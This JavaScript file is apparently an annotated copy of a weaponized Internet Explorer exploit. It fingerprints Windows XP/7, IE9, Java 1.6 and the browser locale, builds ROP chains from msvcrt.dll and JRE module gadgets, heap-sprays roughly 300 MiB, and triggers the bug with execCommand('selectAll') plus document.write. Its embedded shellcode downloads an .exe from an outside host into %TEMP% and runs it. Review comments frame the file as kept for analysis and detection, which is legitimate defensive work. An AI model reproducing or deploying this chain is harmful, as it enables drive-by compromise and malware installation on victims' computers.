/**
 * Encode a 32-bit value as two UTF-16 code units, low word first, so that the
 * value lands in memory as the four little-endian bytes of a DWORD once the
 * string is sprayed. E.g. 0x11110024 -> '%u0024%u1111' -> "\u0024\u1111".
 *
 * Only inputs in 0..0xFFFFFFFF encode correctly: a larger or negative value
 * yields more than eight hex digits and the substr() slicing below no longer
 * splits it into two words (behaviour preserved from the original).
 *
 * @param {number} dword  value to encode
 * @returns {string} two-character string: low 16 bits, then high 16 bits
 */
function int_to_hex(dword)
{
  var hex = Number(dword).toString(16);
  // left-pad to exactly eight hex digits
  for (var pad = 8 - hex.length; pad > 0; pad--) hex = '0' + hex;
  var loWord = hex.substr(4, 8);
  var hiWord = hex.substr(0, 4);
  // unescape() turns each %uXXXX into the matching UTF-16 code unit
  return unescape('%u' + loWord + '%u' + hiWord);
}
/**
 * Pad the payload `s` out to a 0x10000-byte (UTF-16) chunk, tile that chunk
 * eight times and trim the result to 0x80000-0x28 bytes — the unit the spray
 * loop allocates 600 times.
 *
 * Each 64 KiB chunk is: s, then "1" filler, then the "AA" end tag. `fillBytes`
 * is a byte count (two bytes per UTF-16 unit), which is why the filler is cut
 * at fillBytes / 2 characters. If s alone exceeds 64 KiB the count goes
 * negative and the filler collapses to "" (kept as in the original). The 0x28
 * trimmed off the final block presumably leaves room for allocator/string
 * headers — not verifiable from this file.
 *
 * @param {string} s  payload placed at the start of every chunk
 * @returns {string} the tiled block, (0x80000-0x28)/2 UTF-16 units long
 */
function build_block(s)
{
  var tail = unescape("AA");
  var fillBytes = 0x10000 - (s.length * 2 + tail.length * 2);
  // double a seed string until it covers the filler length
  var seed = "11";
  while (seed.length < fillBytes) seed += seed;
  var chunk = s + seed.substring(0, fillBytes / 2) + tail;
  var tiled = "";
  var copies = 8;
  while (copies-- > 0) tiled += chunk;
  return tiled.substring(0, (0x80000 - 0x28) / 2);
}
/**
 * Report whether deployJava (Oracle's deployJava.js, loaded elsewhere) lists a
 * 1.6 JRE and no 1.7 JRE. This is a substring search over the joined version
 * list, so a host with both 1.6 and 1.7 installed yields false. The result
 * selects the Win7 ROP variant, whose absolute addresses presumably come from
 * a module shipped with JRE 1.6 (the paste does not name it).
 *
 * @returns {boolean}
 */
function is_java_16()
{
  var installed = deployJava.getJREs().toString();
  var hasJava7 = installed.indexOf('1.7') != -1;
  var hasJava6 = installed.indexOf('1.6') != -1;
  return !hasJava7 && hasJava6;
}
/**
 * Windows 7 fingerprint: the user agent contains "windows nt 6.1"
 * (case-insensitive). Note the `> 0` test — a match at index 0 would be
 * rejected; kept as in the original.
 * @returns {boolean}
 */
function is_win7()
{
  var ua = navigator.userAgent.toLowerCase();
  return ua.indexOf("windows nt 6.1") > 0;
}
/**
 * Windows XP fingerprint: the user agent contains "windows nt 5.1"
 * (case-insensitive, and not at index 0 because of the `> 0` test).
 * @returns {boolean}
 */
function is_xp()
{
  var ua = navigator.userAgent.toLowerCase();
  return ua.indexOf("windows nt 5.1") > 0;
}
/**
 * Internet Explorer 9 fingerprint: the user agent contains "msie 9"
 * (case-insensitive, and not at index 0 because of the `> 0` test).
 * @returns {boolean}
 */
function is_ie9()
{
  var ua = navigator.userAgent.toLowerCase();
  return ua.indexOf("msie 9") > 0;
}
/**
 * Locale tag as IE reports it via navigator.browserLanguage (an IE-only
 * property; undefined elsewhere), e.g. "zh-cn" or "en-us". build_rop_stack
 * switches on this value to pick a per-locale msvcrt.dll base.
 * @returns {string|undefined}
 */
function language()
{
  var nav = navigator;
  return nav.browserLanguage;
}
/**
 * Build the fake-object / ROP region that is sprayed immediately ahead of the
 * shellcode.
 *
 * The returned string is 0x90 bytes (36 DWORDs, each emitted by int_to_hex)
 * laid out so that, once the spray lands at `spraybase`, a corrupted object
 * whose vtable pointer points into this region dispatches into the gadget
 * chain. The `// +0xNN` comments are byte offsets from spraybase; the caller
 * appends the shellcode right after this region, so spraybase+0x90 is the
 * shellcode start. Two variants:
 *   - Windows XP: gadgets are offsets from msvcrt.dll, whose load address
 *     differs per language edition of XP, hence the locale switch.
 *   - Windows 7 with a 1.6 JRE and no 1.7 JRE: absolute 0x7C34xxxx/0x7C37xxxx
 *     addresses, presumably from a non-ASLR DLL shipped with JRE 1.6 (the
 *     module is not named in the paste).
 * The 0x5500 / 0x1000 / 0x40 triple resembles (size, allocation type,
 * PAGE_EXECUTE_READWRITE) arguments of VirtualProtect/VirtualAlloc, but the
 * API actually reached by the chain is not identified in this file.
 *
 * NOTE(review): weaponized exploit chain, kept for analysis. The hard-coded
 * values (per-locale msvcrt bases, the 0x5500/0x1000/0x40 triple, the
 * spraybase+0x70 "obj" slot that TestArray points the victim object at) are
 * usable as detection material.
 *
 * @param {number} spraybase  address the spray is assumed to land at
 * @returns {string} the 0x90-byte ROP/fake-object region as a UTF-16 string
 * @throws {string} "not supported!" — a bare string, not an Error object —
 *   when neither platform check matches
 */
function build_rop_stack(spraybase)
{
var heapspray = "";
if (is_xp())
{
// msvcrt.dll base on XP depends on the language edition; en-us is the default
var msvcrt_base = 0x77C10000; // en-us
switch (language())
{
case "en-us":
msvcrt_base = 0x77C10000; break;
case "zh-cn":
case "zh-tw":
msvcrt_base = 0x77BE0000; break;
case "ko":
case "ja":
msvcrt_base = 0x77BC0000; break;
default: break; // unknown locale: keep the en-us base and hope
}
heapspray = ""
+ int_to_hex(msvcrt_base+0x000116ec) // +0x00 <-- fake vtable pointer
+ int_to_hex(0x44444444) // +0x04 filler
+ int_to_hex(msvcrt_base+0x00005ed5) // +0x08 -- second virtual call (call [ecx+8])
+ int_to_hex(msvcrt_base+0x00005ed6) // +0x0c
+ int_to_hex(msvcrt_base+0x00005ed6) // +0x10
+ int_to_hex(msvcrt_base+0x00005ed6) // +0x14
+ int_to_hex(msvcrt_base+0x00005ed6) // +0x18 -- first virtual call (call [ecx+18])
+ int_to_hex(msvcrt_base+0x000144c6) // +0x1c gadget
+ int_to_hex(msvcrt_base+0x00001104) // +0x20 gadget
+ int_to_hex(msvcrt_base+0x000144c3) // +0x24 gadget
+ int_to_hex(spraybase) // +0x28
+ int_to_hex(msvcrt_base+0x00012a18) // +0x2c gadget
+ int_to_hex(spraybase+0x90) // +0x30 -- 0x90 = size of this region, i.e. the shellcode address
+ int_to_hex(spraybase) // +0x34
+ int_to_hex(0x00005500) // +0x38 -- size-like argument
+ int_to_hex(0x00001000) // +0x3c -- 0x1000
+ int_to_hex(0x00000040) // +0x40 -- 0x40 (PAGE_EXECUTE_READWRITE value)
+ int_to_hex(spraybase+0x34) // +0x44 -- points back into this region
+ int_to_hex(spraybase) // +0x48
+ int_to_hex(spraybase) // +0x4c
+ int_to_hex(spraybase) // +0x50
+ int_to_hex(spraybase) // +0x54
+ int_to_hex(spraybase) // +0x58
+ int_to_hex(spraybase) // +0x5c
+ int_to_hex(spraybase) // +0x60
+ int_to_hex(spraybase) // +0x64
+ int_to_hex(spraybase) // +0x68
+ int_to_hex(spraybase) // +0x6c
+ int_to_hex(spraybase) // +0x70 <-- "obj": the address TestArray writes into imgx.src
+ int_to_hex(spraybase) // +0x74
+ int_to_hex(spraybase) // +0x78
+ int_to_hex(spraybase) // +0x7c
+ int_to_hex(spraybase) // +0x80
+ int_to_hex(spraybase) // +0x84
+ int_to_hex(spraybase) // +0x88
+ int_to_hex(spraybase) // +0x8c -- last DWORD; shellcode follows at +0x90
;
}
else if(is_win7() && is_java_16())
{
// Absolute addresses: no ASLR assumed for the module they live in
heapspray = ""
+ int_to_hex(0x7C3425B5) // +0x00 <-- fake vtable pointer
+ int_to_hex(0x44444444) // +0x04 filler
+ int_to_hex(0x7c348b05) // +0x08 -- second virtual call (call [ecx+8])
+ int_to_hex(0x7C3425B7) // +0x0c
+ int_to_hex(0x7C3425B7) // +0x10
+ int_to_hex(0x7C3425B7) // +0x14
+ int_to_hex(0x7C3425B7) // +0x18 -- first virtual call (call [ecx+18])
+ int_to_hex(0x7C3425B7) // +0x1c
+ int_to_hex(0x7c34c611) // +0x20 gadget
+ int_to_hex(0x7c37a030) // +0x24 gadget
+ int_to_hex(0x7c34c60e) // +0x28 gadget
+ int_to_hex(spraybase) // +0x2c
+ int_to_hex(0x7c34888f) // +0x30 gadget
+ int_to_hex(spraybase+0x90) // +0x34 -- 0x90 = size of this region, i.e. the shellcode address
+ int_to_hex(spraybase) // +0x38
+ int_to_hex(0x00005500) // +0x3c -- size-like argument
+ int_to_hex(0x00001000) // +0x40 -- 0x1000
+ int_to_hex(0x00000040) // +0x44 -- 0x40 (PAGE_EXECUTE_READWRITE value)
+ int_to_hex(spraybase) // +0x48
+ int_to_hex(spraybase) // +0x4c
+ int_to_hex(spraybase) // +0x50
+ int_to_hex(spraybase) // +0x54
+ int_to_hex(spraybase) // +0x58
+ int_to_hex(spraybase) // +0x5c
+ int_to_hex(spraybase) // +0x60
+ int_to_hex(spraybase) // +0x64
+ int_to_hex(spraybase) // +0x68
+ int_to_hex(spraybase) // +0x6c
+ int_to_hex(spraybase) // +0x70 <-- "obj": the address TestArray writes into imgx.src
+ int_to_hex(spraybase) // +0x74
+ int_to_hex(spraybase) // +0x78
+ int_to_hex(spraybase) // +0x7c
+ int_to_hex(spraybase) // +0x80
+ int_to_hex(spraybase) // +0x84
+ int_to_hex(spraybase) // +0x88
+ int_to_hex(spraybase) // +0x8c -- last DWORD; shellcode follows at +0x90
;
}
else
{
// Any other OS / JRE combination is left alone (string thrown, not an Error)
throw "not supported!";
}
return heapspray;
}
// Address the spray is expected to cover and that the ROP region is built
// against. Assigned without `var`, so it is an implicit global read later by
// TestArray. IE9 gets a base 0x14 lower than other IE versions; the paste does
// not explain the two values.
spraybase = 0x11110024;
if (is_ie9()) spraybase = 0x11110010;
// Stage-2 payload, x86 machine code as %u escapes. Decoding the escapes shows
// four leading 0x90 (NOP) bytes, the sequence 64 8B 35 30 00 00 00
// (mov esi, fs:[0x30], the PEB — consistent with resolving imports by walking
// loaded modules), and the ASCII strings "Kernel32", "Urlmon",
// "%TEMP%\ca.exe" and "http://aprgeigo8.com/count/917.exe": a
// download-and-execute dropper. IOCs: that host/path and ca.exe in %TEMP%.
var shellcode = unescape("%u9090%u9090%u11E8%u0001%uC300%u00E8%u0000%u5800%uC083%u2D04%uFE86%uFFFF%u55C3%uEC8B%u5352%u558B%u3308%uF7C0%u32D0%uB302%uD108%u73E8%u3505%u8320%uEDB8%uCBFE%uF375%u3A80%u7400%u4203%uE7EB%uD0F7%u5A5B%uC2C9%u0004%u5651%u3357%u64C9%u358B%u0030%u0000%u768B%u8B0C%u1C76%u468B%u8B08%u207E%u368B%u4F38%u7518%u5FF3%u595E%u55C3%uEC8B%u5657%u5153%u7D8B%u8B08%u3C5F%u5C8B%u783B%uDF03%u4B8B%u0320%u084D%u3356%u42D2%u348B%u0391%u0875%uE856%uFF87%uFFFF%u453B%u750C%u5EEE%u4B8B%u0324%u084D%uB70F%u5114%u4B8B%u031C%u084D%u458B%u0308%u9104%u5B59%u5F5E%uC2C9%u0008%u8B55%u83EC%uFCC4%u758B%u8B08%u33FE%u33C0%u49C9%uF2FC%uE8AE%uFF78%uFFFF%uAD68%u34D1%u5041%u90E8%uFFFF%u56FF%uD0FF%u4589%u83FC%uFC7D%u7400%uEB19%uFF0F%uFF37%uFC75%u78E8%uFFFF%u89FF%u8307%u04C7%u3F81%u6161%u6161%uE975%uC78B%uC083%uC904%u04C2%uE800%uFEFE%uFFFF%u06EB%uE850%uFFA2%uFFFF%u3880%u7500%uC3F5%u8B55%u81EC%uF8C4%uFFFB%uE8FF%uFEE2%uFFFF%uD88B%uD8E8%uFFFF%u8DFF%u297B%uBD89%uFBFC%uFFFF%uC033%uC933%uFC49%uAEF2%uBD89%uFBF8%uFFFF%u538B%u6809%u0400%u0000%u858D%uFC00%uFFFF%uFF50%uFCB5%uFFFB%uFFFF%u8BD2%u2053%u006A%u006A%u858D%uFC00%uFFFF%uFF50%uF8B5%uFFFB%u6AFF%uFF00%u8BD2%u0D53%u006A%u858D%uFC00%uFFFF%uFF50%u8BD2%u1153%u6A50%uFFFF%uC9D2%u4BC3%u7265%u656E%u336C%u0032%u8A5A%u2B1D%u2C4F%u2845%u50AF%u41A0%u6161%u6161%u7255%u6D6C%u6E6F%u1900%uC3D4%u6192%u6161%u0061%u5425%u4D45%u2550%u635C%u2E61%u7865%u0065%u7468%u7074%u2F3A%u612F%u7072%u6765%u6967%u386F%u632E%u6D6F%u632F%u756F%u746E%u392F%u3731%u652E%u6578%u0000");
// 0x90-byte ROP/fake-object region followed immediately by the shellcode, so
// the spraybase+0x90 entries inside the region point at the shellcode
var heapspray = build_rop_stack(spraybase);
heapspray += shellcode;
// One (0x80000-0x28)-byte block (~512 KiB) holding the payload at every
// 64 KiB boundary. Implicit global again (no `var`).
bigblock = build_block(heapspray);
var blocks = new Array();
// 600 blocks x ~512 KiB = roughly 300 MiB of spray. The [x].join("") round
// trip presumably forces a distinct string copy per slot instead of 600
// references to one string — a common spray idiom, not verifiable here.
for(var i = 0; i < 2 * 300; i++)
blocks[i] = [bigblock].join("");
- /////////////////////////////////////////////////////////////////////////
/**
 * First half of the trigger: select the whole document through execCommand.
 * The name is a decoy — nothing here touches an array.
 */
function SubtleArr()
{
  var doc = document;
  doc.execCommand("selectAll");
}
/**
 * Second half of the trigger: document.write() while the selection made by
 * SubtleArr is live, then store the sprayed fake-object address
 * (spraybase+0x70, the "obj" slot of the ROP region) into the src of an
 * element named imgx in the parent frame, padded with 'A's. Relies on the
 * globals spraybase and int_to_hex and on parent.imgx existing; the paste does
 * not name the underlying IE bug.
 */
function TestArray()
{
  document.write("imgx");
  var objAddr = int_to_hex(spraybase + 0x70);
  parent.imgx.src = "AAAA" + objAddr + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
}